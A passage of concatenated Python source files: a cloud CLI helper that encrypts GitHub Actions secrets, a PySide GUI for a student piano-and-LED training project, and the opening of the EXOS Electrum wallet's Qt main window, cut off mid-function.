stacks = get_file_json(RUNTIME_STACKS)['windows']
for stack in stacks:
if 'github_actions_properties' in stack and stack['github_actions_properties']:
if (stack['github_actions_properties']['app_runtime'].lower() == app_runtime.lower() and
stack['github_actions_properties']['app_runtime_version'].lower() ==
app_runtime_version.lower()):
return {
"display_name": stack['displayName'],
"github_actions_version": stack['github_actions_properties']['github_actions_version']
}
return None
def _encrypt_github_actions_secret(public_key, secret_value):
# Encrypt a Unicode string using the public key
from base64 import b64encode
public_key = public.PublicKey(public_key.encode("utf-8"), encoding.Base64Encoder())
sealed_box = public.SealedBox(public_key)
encrypted = sealed_box.encrypt(secret_value.encode("utf-8"))
return b64encode(encrypted).decode("utf-8")
|
mainwindow.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from PySide import QtCore, QtGui
import time, sys
import threading
import os
execfile("shift_registers.py") # Import the shift registers code from other file
execfile("touch_sound.py") # MPR121 sensor/sounds
execfile("read_lifs.py")
class Ui_MainWindow(QtCore.QObject):
proponisi_mode = False
lastTouched = -1 # -1 when nothing is pressed - gets the value from the MPR121 via a signal
playingSong = False
changeInstrumentSignal = QtCore.Signal(object)
playNote = QtCore.Signal(object)
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.setWindowModality(QtCore.Qt.NonModal)
MainWindow.resize(483, 304)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("piano.jpg"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
MainWindow.setWindowIcon(icon)
self.centralWidget = QtGui.QWidget(MainWindow)
self.centralWidget.setObjectName("centralWidget")
self.tableWidget = QtGui.QTableWidget(self.centralWidget)
self.tableWidget.setGeometry(QtCore.QRect(10, 40, 461, 161))
self.tableWidget.setObjectName("tableWidget")
self.tableWidget.setColumnCount(3)
self.tableWidget.setRowCount(0)
item = QtGui.QTableWidgetItem()
self.tableWidget.setHorizontalHeaderItem(0, item)
item = QtGui.QTableWidgetItem()
self.tableWidget.setHorizontalHeaderItem(1, item)
item = QtGui.QTableWidgetItem()
self.tableWidget.setHorizontalHeaderItem(2, item)
self.label = QtGui.QLabel(self.centralWidget)
self.label.setGeometry(QtCore.QRect(10, 10, 161, 21))
font = QtGui.QFont()
font.setPointSize(12)
font.setWeight(75)
font.setBold(True)
self.label.setFont(font)
self.label.setObjectName("label")
self.pushButton = QtGui.QPushButton(self.centralWidget)
self.pushButton.setGeometry(QtCore.QRect(370, 220, 101, 31))
self.pushButton.setObjectName("pushButton")
self.checkBox = QtGui.QCheckBox(self.centralWidget)
self.checkBox.setGeometry(QtCore.QRect(220,220,140,31))
self.checkBox.setObjectName("checkBox")
self.doubleSpinBox = QtGui.QDoubleSpinBox(self.centralWidget)
self.doubleSpinBox.setGeometry(QtCore.QRect(30,225,80, 30))
self.doubleSpinBox.setSingleStep(0.15)
self.doubleSpinBox.setObjectName("doubleSpinBox")
self.label1 = QtGui.QLabel(self.centralWidget)
self.label1.setGeometry(QtCore.QRect(10, 200,140, 30))
self.label1.setObjectName("label1")
MainWindow.setCentralWidget(self.centralWidget)
self.menuBar = QtGui.QMenuBar(MainWindow)
self.menuBar.setGeometry(QtCore.QRect(0, 0, 483, 21))
self.menuBar.setObjectName("menuBar")
self.menuFile = QtGui.QMenu(self.menuBar)
self.menuFile.setObjectName("menuFile")
self.menuAbout = QtGui.QMenu(self.menuBar)
self.menuAbout.setObjectName("menuAbout")
self.menu = QtGui.QMenu(self.menuBar)
self.menu.setObjectName("menu")
MainWindow.setMenuBar(self.menuBar)
self.statusBar = QtGui.QStatusBar(MainWindow)
self.statusBar.setObjectName("statusBar")
MainWindow.setStatusBar(self.statusBar)
self.actionExit = QtGui.QAction(MainWindow)
self.actionExit.setObjectName("actionExit")
self.action = QtGui.QAction(MainWindow)
self.action.setObjectName("action")
self.action_2 = QtGui.QAction(MainWindow)
self.action_2.setObjectName("action_2")
self.actionLed_Test = QtGui.QAction(MainWindow)
self.actionLed_Test.setObjectName("actionLed_Test")
self.actionAbout = QtGui.QAction(MainWindow)
self.actionAbout.setObjectName("actionAbout")
self.menuFile.addAction(self.actionExit)
self.menuAbout.addAction(self.actionAbout)
self.menu.addAction(self.action)
self.menu.addAction(self.action_2)
self.menu.addAction(self.actionLed_Test)
self.menuBar.addAction(self.menuFile.menuAction())
self.menuBar.addAction(self.menu.menuAction())
self.menuBar.addAction(self.menuAbout.menuAction())
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
self.tableWidget.horizontalHeader().setResizeMode(QtGui.QHeaderView.Stretch) # Stretch the columns to fill the table width
self.action_2.setCheckable(True)
# connect the menu and button actions to the functions defined below
self.actionAbout.triggered.connect(self.aboutDialogMsg) # Connect the About dialog with the Help->About menu button
self.actionExit.triggered.connect(self.exitApp) # Connect the File->Exit menu button with self.exitApp
self.actionLed_Test.triggered.connect(self.ledTest) # Connect "Επιλογές" (Options) -> Led Test with self.ledTest
self.action.triggered.connect(self.chooseInstrumentA) # Connect "Επιλογές" (Options) -> "Επιλογή οργάνου" (Choose Instrument) with self.chooseInstrumentA
self.action_2.triggered.connect(self.setProponisi)
self.pushButton.clicked.connect(self.playSong)
#test code for shift registers
shiftRegister.clearAll() # Make sure all leds are turned off first
#shiftRegister.testLeds()
self.sensor = touch_sensor() # Initialize the capacitive touch sensor
self.sensor.dataEmit.connect(self.printEmited) # Connect the sensor to printEmited, mainly for training mode
self.playNote.connect(self.sensor.playNote) # Connect the local note-playing signal to the threaded instrument/sensor
self.changeInstrumentSignal.connect(self.sensor.changeInstrument)
self.sensor.start() # Run the capacitive sensor in its own thread so the GUI is not blocked
self.changeInstrumentSignal.emit("piano") # Emit a signal to change the instrument in the thread
instrument.chooseInstrument("piano") # Set piano as the default instrument
lis = [0]*40
for x in TELO3_LEDS1:
lis[x] = 1
shiftRegister.writeSRL(lis, True)
readLif.openFiles() # Read the lif files from the folder
for name in readLif.getFileNames(): # Iterate over all the song file names
rowCount = self.tableWidget.rowCount() # Current row count, so the new row is appended at the end
self.tableWidget.insertRow(rowCount) # Append a new row after the last one
self.tableWidget.setItem(rowCount, 0, QtGui.QTableWidgetItem(name)) # First column: song title
self.tableWidget.setItem(rowCount, 1, QtGui.QTableWidgetItem(readLif.getDifficulty(name))) # Second column: difficulty
self.tableWidget.setItem(rowCount, 2, QtGui.QTableWidgetItem(readLif.getInstrument(name))) # Third column: instrument the lif should be played on
return # Setup UI
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(QtGui.QApplication.translate("MainWindow", "PIano Project 2016", None, QtGui.QApplication.UnicodeUTF8))
self.tableWidget.horizontalHeaderItem(0).setText(QtGui.QApplication.translate("MainWindow", "Τίτλος Τραγουδιού", None, QtGui.QApplication.UnicodeUTF8))
self.tableWidget.horizontalHeaderItem(1).setText(QtGui.QApplication.translate("MainWindow", "Δυσκολία", None, QtGui.QApplication.UnicodeUTF8))
self.tableWidget.horizontalHeaderItem(2).setText(QtGui.QApplication.translate("MainWindow", "Όργανο", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("MainWindow", "Λίστα τραγουδιών:", None, QtGui.QApplication.UnicodeUTF8))
self.pushButton.setText(QtGui.QApplication.translate("MainWindow", "Παίξε!", None, QtGui.QApplication.UnicodeUTF8))
self.menuFile.setTitle(QtGui.QApplication.translate("MainWindow", "Αρχείο", None, QtGui.QApplication.UnicodeUTF8))
self.menuAbout.setTitle(QtGui.QApplication.translate("MainWindow", "Help", None, QtGui.QApplication.UnicodeUTF8))
self.menu.setTitle(QtGui.QApplication.translate("MainWindow", "Επιλογές", None, QtGui.QApplication.UnicodeUTF8))
self.actionExit.setText(QtGui.QApplication.translate("MainWindow", "Έξοδος", None, QtGui.QApplication.UnicodeUTF8))
self.action.setText(QtGui.QApplication.translate("MainWindow", "Επιλογή Οργάνου", None, QtGui.QApplication.UnicodeUTF8))
self.action_2.setText(QtGui.QApplication.translate("MainWindow", "Προπόνηση Mode", None, QtGui.QApplication.UnicodeUTF8))
self.actionLed_Test.setText(QtGui.QApplication.translate("MainWindow", "Led Test", None, QtGui.QApplication.UnicodeUTF8))
self.actionAbout.setText(QtGui.QApplication.translate("MainWindow", "About", None, QtGui.QApplication.UnicodeUTF8))
self.checkBox.setText(QtGui.QApplication.translate("MainWindow", "Επίδειξη Κομματιού", None, QtGui.QApplication.UnicodeUTF8))
self.label1.setText(QtGui.QApplication.translate("MainWindow", "Επιτάχυνση Τραγουδιού:", None, QtGui.QApplication.UnicodeUTF8))
return
def aboutDialogMsg(self):
msg = QtGui.QMessageBox() # Create a message box listing the project's creators
msg.setWindowTitle("About") # Set the title
msg.setText(u"Project για τα Τέλο 3 - 2016<br/> Σαμαράς Τάσος - Project Manager<br/>Αγγελίδης Αλέξανδρος<br/> Βασιλειάδης Κώστας<br/>Ηλιάδης Νίκος<br/>Κρασογιάννης Σταύρος<br/> Μητρόπουλος Σπύρος<br/>Μπουριτζής Σάκης<br/>")
msg.exec_() # Show the message box on screen
return
def ledTest(self):
# User pressed on the Led Test button on the menu
t1 = threading.Thread(target=shiftRegister.testLeds) # Start the test in a new thread
t1.start()
msg = QtGui.QMessageBox.information(None, u"Τεστ σε εξέλιξη", u"Το τεστ γίνεται αυτή τη στιγμή. Πατήστε ΟΚ και περιμένετε για το μήνυμα ολοκλήρωσης") # Inform the user about the led test
t1.join() # Wait until thread completes the test and then call the testComplete function
self.testComplete()
return
def testComplete(self):
# When the led test completes this message will show up
msg = QtGui.QMessageBox()
msg.setWindowTitle(u"Επιτυχία!")
msg.setText(u"Το τέστ ολοκληρώθηκε με επιτυχία!")
msg.exec_()
return
def chooseInstrumentA(self):
# When the choose-instrument menu entry is pressed, prompt the user to select an instrument from the instruments folder
instrumentList = os.listdir(instrument.baseInstrumentFolder) # List the instruments folder so the user can select by folder name
choice, answer = QtGui.QInputDialog.getItem(None, u"Επιλογή Οργάνου", u"Επιλέξτε όργανο από τη λίστα παρακάτω", instrumentList, 0, False) # Pop up the question box
if answer: # If the user pressed the "OK" button
#instrument.chooseInstrument(choice)
self.changeInstrumentSignal.emit(choice)
return
def printEmited(self, data):
# Receive the signal asynchronously from the MPR121 thread and light the matching LED (training mode only)
if self.proponisi_mode:
led_list = [0]*40
led_list[data*3] = 1
shiftRegister.writeSRL(led_list, True)
return
def setProponisi(self):
# Toggle training ("proponisi") mode when its menu action is triggered
self.proponisi_mode = not self.proponisi_mode
shiftRegister.clearAll()
return
def playSong(self):
if len(self.tableWidget.selectedItems()) < 1: # Check that a song row is selected
msg = QtGui.QMessageBox()
msg.setWindowTitle(u"Επιλογή Τραγουδιού")
msg.setText(u"Παρακαλώ επιλέξτε τραγούδι πρώτα και μετά πατήστε το πλήκτρο \"Παίξε!\"")
msg.exec_()
return
filename = ""
for item in self.tableWidget.selectedItems():
filename = self.tableWidget.item(item.row(), 0).text() # Get the filename from the row the user selected
self.proponisi_mode = False # Disable training mode if it is enabled
self.action_2.setChecked(False) # Uncheck the training-mode menu entry
shiftRegister.clearAll() # Clear all leds to start playing the song
MainWindow.setEnabled(False)
self.playingSong = True
msg = QtGui.QMessageBox()
msg.setWindowTitle(u"Τραγούδι επιλέχθηκε")
msg.setText(u"Το τραγούδι <strong>" + filename + u"</strong> έχει επιλεγεί. Όταν είστε έτοιμοι πατήστε το πλήκτρο OK")
msg.exec_()
time.sleep(1)
totalLines = readLif.getTotalRows(filename)
fileLines = readLif.getLines(filename)
speedUp = self.doubleSpinBox.value()
if speedUp <= 0: # Guard: the spin box defaults to 0, which would divide by zero below
speedUp = 1.0
for x in range(2, totalLines-2): # Read the notes and their delays, looking three notes ahead
KeyToBePressed, DelayUntiPressed = fileLines[x].split(":", 2) # Current note and its delay
KeyToBePressed1, DelayUntiPressed1 = fileLines[x+1].split(":", 2) # The following note
KeyToBePressed2, DelayUntiPressed2 = fileLines[x+2].split(":", 2) # And the one after that
led_list = [0]*40 # Make a list with all LEDs cleared
led_list[int(KeyToBePressed)*3] = 1 # Blue LED: the note to play now
led_list[int(KeyToBePressed1)*3+1] = 1 # Green LED: the next note after the blue one
led_list[int(KeyToBePressed2)*3+2] = 1 # Red LED: the note coming after that
if self.checkBox.isChecked(): # Demonstration mode: the program also plays the note itself
self.playNote.emit(int(KeyToBePressed))
shiftRegister.writeSRL(led_list, True) # Write the list to the shift registers in reversed order
time.sleep(float(DelayUntiPressed)*(1/speedUp))
# The last two notes fall outside the loop range, so light their LEDs manually
KeyToBePressed, DelayUntiPressed = fileLines[totalLines-2].split(":", 2)
KeyToBePressed1, DelayUntiPressed1 = fileLines[totalLines-1].split(":", 2)
led_list = [0]*40
led_list[int(KeyToBePressed)*3] = 1
led_list[int(KeyToBePressed1)*3+1] = 1
self.playNote.emit(int(KeyToBePressed))
shiftRegister.writeSRL(led_list, True)
time.sleep(float(DelayUntiPressed)*(1/speedUp))
KeyToBePressed, DelayUntiPressed = fileLines[totalLines-1].split(":", 2)
led_list = [0]*40
led_list[int(KeyToBePressed)*3] = 1
self.playNote.emit(int(KeyToBePressed))
shiftRegister.writeSRL(led_list, True)
time.sleep(float(DelayUntiPressed)*(1/speedUp))
shiftRegister.clearAll()
msg = QtGui.QMessageBox()
msg.setWindowTitle(u"Τέλος Τραγουδιού!")
msg.setText(u"Το τραγούδι τελείωσε! Αν θέλετε μπορείτε να επιλέξετε άλλο τραγούδι και να παίξετε ξανά!")
msg.exec_()
shiftRegister.clearAll()
MainWindow.setEnabled(True) # Make the window visible/Enabled again
self.playingSong = False
return
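# Layout note (added for clarity): led_list packs three LEDs per key, so for a
# hypothetical key k, index k*3 is the blue "play now" LED, k*3+1 the green
# "next note" LED and k*3+2 the red "note after next" LED, e.g.:
#
#   led_list = [0]*40
#   led_list[4*3] = 1      # blue LED of key 4
#   led_list[4*3 + 1] = 1  # green LED of key 4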
def exitApp(self):
shiftRegister.clearAll() # Clear all the leds before closing
sys.exit()
if __name__ == "__main__":
import sys
app = QtGui.QApplication(sys.argv)
MainWindow = QtGui.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
|
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum_exos
from electrum_exos import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum_exos.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum_exos.plugin import run_hook
from electrum_exos.i18n import _
from electrum_exos.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI)
from electrum_exos.transaction import Transaction, TxOutput
from electrum_exos.address_synchronizer import AddTransactionException
from electrum_exos.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum_exos.version import ELECTRUM_VERSION, ELECTRUM_BUILD
from electrum_exos.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_exos.exchange_rate import FxThread
from electrum_exos.simple_config import SimpleConfig
from electrum_exos.logging import Logger
from electrum_exos.paymentrequest import PR_PAID
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen)
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
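# Hedged usage sketch (added; not part of the original): wiring a StatusBarButton
# to a zero-argument callback. The icon name and handler are hypothetical.
#
#   sb = StatusBarButton(read_QIcon("status_connected.png"), _("Network"),
#                        lambda: print("status clicked"))
#   self.statusBar().addPermanentWidget(sb)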
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("exos-electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="EXOS Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of EXOS Electrum.") + " " +
_("Would you like to be notified when there is a newer version of EXOS Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to EXOS-Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def on_history(self, b):
self.wallet.clear_coin_price_cache()
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(str(e))
def on_network(self, event, *args):
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.logger.info(f"unexpected network message: {event} {args}")
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network_qt signal: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f, daemon=True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
self.need_update.set()
# Once the GUI has been initialized, check whether there is anything to announce (the callback may have fired before the GUI existed)
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except Exception:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "EXOS-Electrum Testnet" if constants.net.TESTNET else "EXOS-Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend EXOS with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
